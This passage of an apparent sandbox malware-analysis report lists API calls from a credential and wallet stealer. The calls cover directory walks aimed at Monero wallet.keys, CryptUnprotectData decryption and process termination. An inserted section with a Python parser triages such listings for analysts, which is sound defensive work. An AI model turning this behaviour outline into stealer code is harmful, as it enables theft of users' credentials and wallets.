                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: e36d1492c99f5edb626b06a7fc865ee1c241f78ffcb212ced83a2105cb60e392
                              • Instruction ID: c42f01d8114da59818fa61dd3fdaebb0dec5744d1413d702166373145d87d04a
                              • Opcode Fuzzy Hash: e36d1492c99f5edb626b06a7fc865ee1c241f78ffcb212ced83a2105cb60e392
                              • Instruction Fuzzy Hash: AE12D0719101289BCB1DFB64ECA6AEE7379FF54310F4045D9A50AA6191EF306BC8CF92
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00830C32), ref: 0081DF5E
                              • StrCmpCA.SHLWAPI(?,008315C0), ref: 0081DFAE
                              • StrCmpCA.SHLWAPI(?,008315C4), ref: 0081DFC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0081E4E0
                              • FindClose.KERNEL32(000000FF), ref: 0081E4F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 54d476eccf0ab9e0ca3e726395576e3f7931f6c77b75a759fda0639e693a109d
                              • Instruction ID: a8cd087a795fdafe24da1ee979fc19208cd03108e2a5337009c4c23ad9f14b60
                              • Opcode Fuzzy Hash: 54d476eccf0ab9e0ca3e726395576e3f7931f6c77b75a759fda0639e693a109d
                              • Instruction Fuzzy Hash: 59F1BC719141289BCB19EB64EDA6EEE7339FF54310F4045D9B41AA2091EF306BC9CF62
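The file-enumeration records in this part of the report all show the same Win32 shape: wsprintfA builds a `%s\*` or `%s\%s` path, FindFirstFileA opens the search, two StrCmpCA calls against string constants four bytes apart follow (consistent with the usual skip of the "." and ".." entries; that reading is an inference from the listing, the report does not resolve the constants), the body recurses or copies (CopyFileA, DeleteFileA), and FindNextFileA/FindClose close the loop. Resolved arguments such as `\Monero\wallet.keys` and `\*.*` and the `prefs.js` string show which files the loops are after. The script below is an added example, not part of the Joe Sandbox report and not Stealc code: it parses "APIs" and "String ID" lines in this report format and tags each function record by that pattern, so a long report can be triaged without reading every card. The sample text is constructed from a few of the records above (their API lines and addresses), combined into two records for the demonstration.

```python
"""Triage Joe Sandbox per-function API listings for file-enumeration routines.

Added example; not from the Joe Sandbox report and not Stealc code.  Parses
the "• API.MODULE(args), ref: ADDR" and "• String ID: a$b" lines of function
records and tags each record by the Win32 pattern it shows.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
STRING_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<s>.*)$")
END_RE = re.compile(r"^\s*•\s*Instruction Fuzzy Hash:")   # last field of a record


@dataclass
class Call:
    api: str
    module: str
    ref: str
    args: List[str]
    sub: Optional[str]      # address of the subcall the API belongs to, None if direct


@dataclass
class Record:
    calls: List[Call] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)

    @property
    def anchor(self) -> str:
        """Address of the first API reference made directly by the function."""
        direct = [c.ref for c in self.calls if c.sub is None]
        return direct[0] if direct else (self.calls[0].ref if self.calls else "?")


def parse_records(text: str) -> List[Record]:
    records, cur = [], Record()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.calls.append(Call(m["api"], m["mod"], m["ref"], args, m["sub"]))
            continue
        m = STRING_RE.match(line)
        if m:
            cur.strings.extend(s for s in m["s"].split("$") if s)
            continue
        if END_RE.match(line):
            if cur.calls or cur.strings:
                records.append(cur)
            cur = Record()
    return records


def classify(rec: Record) -> List[str]:
    direct = [c for c in rec.calls if c.sub is None]
    names = {c.api for c in direct}
    tags = []
    if {"FindFirstFileA", "FindNextFileA", "FindClose"} <= names:
        tags.append("directory-walk")
        # Two StrCmpCA calls in the loop are read as the "." / ".." skip
        # (assumption: the compared constants are not resolved in the listing).
        if sum(c.api == "StrCmpCA" for c in direct) >= 2:
            tags.append("skips-dot-entries")
    if "wsprintfA" in names and any("\\*" in s for s in rec.strings):
        tags.append("builds-wildcard-path")
    if "CopyFileA" in names:
        tags.append("file-grab")
    if "DeleteFileA" in names:
        tags.append("deletes-source")
    return tags


def interesting_paths(rec: Record) -> List[str]:
    """Literal path fragments the sandbox resolved in call arguments."""
    return sorted({a for c in rec.calls for a in c.args if "\\" in a})


def triage(text: str) -> Dict[str, dict]:
    return {r.anchor: {"tags": classify(r), "paths": interesting_paths(r),
                       "strings": r.strings} for r in parse_records(text)}


# Constructed sample: two records assembled from API lines in the report above.
SAMPLE = r"""
APIs
• wsprintfA.USER32 ref: 00824113
• FindFirstFileA.KERNEL32(?,?), ref: 0082412A
• StrCmpCA.SHLWAPI(?,00830F94), ref: 00824158
• StrCmpCA.SHLWAPI(?,00830F98), ref: 0082416E
• FindNextFileA.KERNEL32(000000FF,?), ref: 008242BC
• FindClose.KERNEL32(000000FF), ref: 008242D1
Strings
• String ID: %s\%s$%s\*
• Instruction Fuzzy Hash: 645141B1
APIs
• Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00830C32), ref: 0081DF5E
• StrCmpCA.SHLWAPI(?,008315C0), ref: 0081DFAE
• StrCmpCA.SHLWAPI(?,008315C4), ref: 0081DFC4
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00811D80
• DeleteFileA.KERNEL32(00000000), ref: 00811E0A
• FindNextFileA.KERNEL32(000000FF,?), ref: 0081E4E0
• FindClose.KERNEL32(000000FF), ref: 0081E4F2
• String ID: \*.*
• Instruction Fuzzy Hash: 59F1BC71
"""

if __name__ == "__main__":
    for anchor, info in triage(SAMPLE).items():
        print(anchor, info["tags"], info["paths"], info["strings"])
```

Feed it the text of the whole "Execution Graph" section and sort the result by tag: the records tagged `file-grab` are the ones to open first, and `paths` gives the resolved targets (wallet files, browser profile files) without having to chase every `Part of subcall function` line by hand.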
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008315A8,00830BAF), ref: 0081DBEB
                              • StrCmpCA.SHLWAPI(?,008315AC), ref: 0081DC33
                              • StrCmpCA.SHLWAPI(?,008315B0), ref: 0081DC49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0081DECC
                              • FindClose.KERNEL32(000000FF), ref: 0081DEDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00829905
                              • Process32First.KERNEL32(00819FDE,00000128), ref: 00829919
                              • Process32Next.KERNEL32(00819FDE,00000128), ref: 0082992E
                              • StrCmpCA.SHLWAPI(?,00819FDE), ref: 00829943
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0082995C
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0082997A
                              • CloseHandle.KERNEL32(00000000), ref: 00829987
                              • CloseHandle.KERNEL32(00819FDE), ref: 00829993
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 2696918072-0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ?1_$M~$OJU$ajwo$b1.{$uZ_<$HoHo$'o
                              • API String ID: 0-618255110
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              • GetKeyboardLayoutList.USER32(00000000,00000000,008305B7), ref: 00827D71
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00827D89
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00827D9D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00827DF2
                              • LocalFree.KERNEL32(00000000), ref: 00827EB2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00830D79), ref: 0081E5A2
                              • StrCmpCA.SHLWAPI(?,008315F0), ref: 0081E5F2
                              • StrCmpCA.SHLWAPI(?,008315F4), ref: 0081E608
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0081ECDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: BHg:$_V$as9c$evX/$n/z$v7
                              • API String ID: 0-1227918139
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: \u$\u${${$}$}
                              • API String ID: 0-582841131
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0081C971
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0081C97C
                              • lstrcat.KERNEL32(?,00830B47), ref: 0081CA43
                              • lstrcat.KERNEL32(?,00830B4B), ref: 0081CA57
                              • lstrcat.KERNEL32(?,00830B4E), ref: 0081CA78
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 00826C0C
                              • sscanf.NTDLL ref: 00826C39
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00826C52
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00826C60
                              • ExitProcess.KERNEL32 ref: 00826C7A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 9d471255cba3021318b9ecb89529f0d68bb0a17657f29c0ef10e79ec7826459b
                              • Instruction ID: 8534dd40029f418d3da4c715a05e542d3c49564d0efea42472262640fab64d83
                              • Opcode Fuzzy Hash: 9d471255cba3021318b9ecb89529f0d68bb0a17657f29c0ef10e79ec7826459b
                              • Instruction Fuzzy Hash: 8A21CD75D14258ABCF08EFE8E9459EEB7B9FF48300F048529E506E7250EB349644CB65
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 008172AD
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008172B4
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008172E1
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00817304
                              • LocalFree.KERNEL32(?), ref: 0081730E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
• Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 21327e8fc7d4a34f602a17f49fc1dbdccf073237dc23668b218e358641328c75
                              • Instruction ID: bbace30ea043d0ee18a0e1ebc3c737c412d74ab0ecf94e4f41aac6bbde771eb0
                              • Opcode Fuzzy Hash: 21327e8fc7d4a34f602a17f49fc1dbdccf073237dc23668b218e358641328c75
                              • Instruction Fuzzy Hash: 9D01E975A44308BBDB14DBE4DC46FAE7778EB44B04F104558FB05AA2C0D6B0AA419B65
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008297AE
                              • Process32First.KERNEL32(00830ACE,00000128), ref: 008297C2
                              • Process32Next.KERNEL32(00830ACE,00000128), ref: 008297D7
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 008297EC
                              • CloseHandle.KERNEL32(00830ACE), ref: 0082980A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
• Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: de6ab280cfcd4ace9a9398d3e53a20a668a8c47748c852a9529da0602868df13
                              • Instruction ID: 46dc9fdba943cfe0585fc7ef714d69e85f33ebe6458081c711e7fbb9593846d6
                              • Opcode Fuzzy Hash: de6ab280cfcd4ace9a9398d3e53a20a668a8c47748c852a9529da0602868df13
                              • Instruction Fuzzy Hash: 2F010C75A14218ABDB20DFA4DD84BDDB7F8FB08700F1446D8E549DA250EB309A81CF50
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
• Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: <7\h$huzx
                              • API String ID: 0-2989614873
                              • Opcode ID: ab1d40ea7e0eeb2e93dffcc38579f2f2ae73fc34c918808c8c92b9b41b718b51
                              • Instruction ID: 8f95b3254a262fa560edc273d1e238435d0de773c8f41c083e3376341724596e
                              • Opcode Fuzzy Hash: ab1d40ea7e0eeb2e93dffcc38579f2f2ae73fc34c918808c8c92b9b41b718b51
                              • Instruction Fuzzy Hash: DE63527241EBD81ECB27CB3087B61517F66FA53210B1D49CEC8C1CB5B3C694AA16E396
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
• Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: /J}w$:cqV$=G=?$>I+_
                              • API String ID: 0-4099484877
                              • Opcode ID: 032d3f18fc4aca5e7941883cc2b40794b241ebee2f2ff67325d5cb9943805b5c
                              • Instruction ID: f11ffae61e3ff2e057d43606127cd134148e80c19cccfacf59e62036faac2847
                              • Opcode Fuzzy Hash: 032d3f18fc4aca5e7941883cc2b40794b241ebee2f2ff67325d5cb9943805b5c
                              • Instruction Fuzzy Hash: 1BB2E4F3A0C2049FE704AE2DEC8567AFBE5EB94720F16493DEAC5C7740EA3558018697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
• Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !Y+u$cq?W$|+p$[/
                              • API String ID: 0-2291234517
                              • Opcode ID: 2ac7f57dbee9ba5420ccd759e54afd65c5f7ecbd9f49eae0c3ec9ecf75d8f2b8
                              • Instruction ID: c62d0b6988e3300786a5fe0bf4fff38badff4ad3934fa0eea0f78d8a88a6e7d9
